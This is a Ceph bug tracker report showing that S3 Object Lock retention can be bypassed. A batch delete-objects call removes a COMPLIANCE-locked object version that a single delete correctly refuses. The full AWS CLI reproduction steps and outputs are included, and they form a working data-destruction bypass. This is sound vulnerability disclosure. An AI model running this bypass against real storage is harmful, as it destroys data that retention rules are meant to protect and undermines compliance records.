Actions
Bug #47586
closedAble to circumvent S3 Object Lock using deleteobjects command
% Done:
0%
Source:
Tags:
Backport:
octopus, nautilus
Regression:
No
Severity:
2 - major
Reviewed:
Description
Ceph supports the S3 object lock which prevents objects being deleted until their retention date has expired, however it appears to be possible to circumvent this and delete objects before their retention date has passed by using the option to delete multiple objects at once.
See the following example using the AWS CLI to confirm this.
Create an object
$ aws --profile=ceph --endpoint-url https://ceph s3api put-object --bucket andrew-test --key ceph-bug --object-lock-mode COMPLIANCE --object-lock-retain-until "2020-09-22 16:00:00"
{
"ETag": "\"d41d8cd98f00b204e9800998ecf8427e\"",
"VersionId": "-cBhsp3jHdeWAgxH9Grd.ZCRHsyT8n-"
}
Confirm object lock
$ aws --profile=ceph --endpoint-url https://ceph s3api get-object-retention --bucket andrew-test --key ceph-bug
{
"Retention": {
"Mode": "COMPLIANCE",
"RetainUntilDate": "2020-09-22T16:00:00.000000000Z"
}
}
Attempt to delete the version using a single delete
$ aws --profile=ceph --endpoint-url https://ceph s3api delete-object --bucket andrew-test --key ceph-bug --version-id=-cBhsp3jHdeWAgxH9Grd.ZCRHsyT8n-
An error occurred (AccessDenied) when calling the DeleteObject operation: Unknown
This correctly fails.
Attempt to delete the version using a multiple delete
$ aws --profile=ceph --endpoint-url https://ceph s3api delete-objects --bucket andrew-test --delete "Objects=[{Key=ceph-bug,VersionId=-cBhsp3jHdeWAgxH9Grd.ZCRHsyT8n-}],Quiet=false"
{
"Deleted": [
{
"Key": "ceph-bug",
"VersionId": "-cBhsp3jHdeWAgxH9Grd.ZCRHsyT8n-"
}
]
}
This succeeds and deletes the object version, despite it still being before the retention date.
Actions